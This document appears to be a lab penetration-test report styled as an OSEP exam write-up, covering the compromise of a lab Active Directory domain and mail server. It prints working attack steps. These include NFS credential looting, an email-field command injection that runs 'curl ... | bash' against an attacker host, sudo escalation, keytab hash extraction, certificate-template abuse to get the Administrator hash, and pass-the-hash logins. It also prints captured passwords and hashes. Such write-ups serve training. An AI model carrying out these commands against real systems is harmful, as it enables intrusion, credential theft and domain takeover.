Offensive Security Experienced Penetration Tester Exam Report

Detailed Findings and Recommendations

The scope of this penetration test is to identify, exploit and report the results of of penetration test performed on following set of IP addresses.

ID	IPs	Name
Machine 1	10.10.201.37	DC01.hybrid.vl
Machine 2	10.10.201.38	mail01.hybrid.vl

Enumeration

Namp

The initial scan results for machine 1 shows few open port on machine

sudo nmap -sC -sV -oA machine_1 10.10.201.37

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-07 11:15:20Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active 
Subject: commonName=dc01.hybrid.vl
DNS:dc01.hybrid.vl

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp  open  ssl/ldap      Microsoft Windows Active 

3268/tcp open  ldap          Microsoft Windows Active 

3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP

| rdp-ntlm-info: 
|   Target_Name: HYBRID
|   NetBIOS_Domain_Name: HYBRID
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hybrid.vl
|   DNS_Computer_Name: dc01.hybrid.vl
|   Product_Version: 10.0.20348

Nmap scan report for 10.10.201.38

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)

25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING

80/tcp   open  http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Redirecting...


110/tcp  open  pop3     Dovecot pop3d

| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
|_pop3-capabilities: SASL UIDL STLS AUTH-RESP-CODE TOP RESP-CODES CAPA PIPELINING

111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37190/udp   mountd
|   100005  1,2,3      38717/udp6  mountd
|   100005  1,2,3      40645/tcp6  mountd
|   100005  1,2,3      56357/tcp   mountd
|   100021  1,3,4      34005/tcp   nlockmgr
|   100021  1,3,4      34426/udp6  nlockmgr
|   100021  1,3,4      34753/tcp6  nlockmgr
|   100021  1,3,4      40896/udp   nlockmgr
|   100024  1          34054/udp6  status
|   100024  1          46197/udp   status
|   100024  1          48587/tcp6  status
|   100024  1          51705/tcp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl

143/tcp  open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: ID STARTTLS listed have more IDLE ENABLE post-login LOGIN-REFERRALS OK Pre-login SASL-IR LOGINDISABLEDA0001 LITERAL+ capabilities IMAP4rev1

587/tcp  open  smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING

993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: ID OK listed have more IDLE ENABLE post-login LOGIN-REFERRALS capabilities Pre-login AUTH=PLAIN IMAP4rev1 LITERAL+ AUTH=LOGINA0001 SASL-IR


995/tcp  open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) UIDL RESP-CODES AUTH-RESP-CODE TOP USER CAPA PIPELINING

2049/tcp open  nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

showmount -e 10.10.201.38

sudo mount -t nfs -o vers=2,nolock 10.10.201.38:/opt/share ./shared

Loot

admin@hybrid.vl:{plain}Duckling21 peter.turner@hybrid.vl:{plain}PeterIstToll!

peter.turner&curl${IFS}10.8.2.41/bad${IFS}|${IFS}bash&@hybrid.vl

nfs_share

• Download passwords.kdbx
• Password Reuse of peter in keepass2 to open the passwords.kdbx
• password obtained from the db

b0cwR+G4Dzl_rw

ssh 'peter.turner@hybrid.vl'@10.10.201.38

sudo -l

sudo -su

cd /root

cat flag.txt

VL{732f10b1eb439d9291c2b88c3fed66fe}

download krb5.keytab

./keytabextract.py /home/jay/krb5.keytab

RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
	REALM : HYBRID.VL
	SERVICE PRINCIPAL : MAIL01$/
	NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
	AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
	AES-128 HASH : 3a732454c95bcef529167b6bea476458

certipy find -vulnerable -u 'peter.turner'@hybrid.vl -p b0cwR+G4Dzl_rw -dc-ip 10.10.201.37

• Esc 1 for domain computer

certipy req  -u 'Mail01$'@hybrid.vl -ca 'hybrid-DC01-CA' -template HybridComputers -hashes 0f916c5246fdbc7ba95dcef4126d57bd -upn 'administrator@hybrid.vl' -dns 'dc01.hybrid.vl' -key-size 4096 -debug

certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.201.37

Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:60701e8543c9f6db1a2af3217386d3dc

cme smb 10.10.201.37 -u 'administrator' -H 60701e8543c9f6db1a2af3217386d3dc --shares

evil-winrm -i 10.10.201.37 -u Administrator -H 60701e8543c9f6db1a2af3217386d3dc

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt

Additional Items

Appendix - AMSI Bypass code

Appendix - Powershell Shellcoderunner

Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code

Appendix - Risk Assessment Matrix

Appendix - Proof and Local Contents

Hostname	local.txt Contents	proof.txt Contents
HOSTNAME	foo	bar
HOSTNAME	foo	bar

Appendix - Credentials obtained

NTLM Hashes

Username	NTLM Hash	Found in
Administrator	HASH	HOSTNAME

Passwords

Found in	Corresponds to	Password
HOSTNAME	USER BELONGS	Password123*

Credential’s files

Found in	File	Type
HOSTNAME	FILE FROM WHERE IS IT	Example: SSH Priv. Key